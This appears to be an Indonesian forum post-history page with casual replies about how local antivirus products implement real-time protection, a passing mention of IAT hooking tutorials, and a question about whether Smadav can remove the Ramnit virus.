Bener untuk teknik advanced cara diatas tidak direkomendasikan, tapi untuk ukuran AV Lokal itu udah lebih dari cukup daripada ngk bisa bikin RTP sama sekali, hehe tau sendiri lah AV lokal masih belum bisa menggunakan teknik hooking, untuk itu penggantinya yang sederhana aja  :P

lah makanya saya kasi link ke sample dan sedikit tutor biar bisa walaupun hanya sekadar iat hooking.. sedikit - demi sedikit pasti akan bisa kan ?

Yup, karena belajar itu ada kadarnya, sama seperti makan, tidak sekali hap langsung habis satu panci.
Ya lebih baik sederhana nan bijak daripada berlebihan namun nubazir.

yang suruh makan lansung satu panci siapa yah ?





10
Chit-Chat / Re: SMADĪ”V, AV lokal paling hebat !!!!!
« pada: Desember 22, 2011, 03:09:38 PM »
bagaimana dengan ramnit-nya sendiri ? apa bisa di disinfect virusnya sama smadav ? atau silahkan gunakan av lain soalnya smadav cuman buat virus lokal ?

Halaman: [1] 2 3 4 ... 12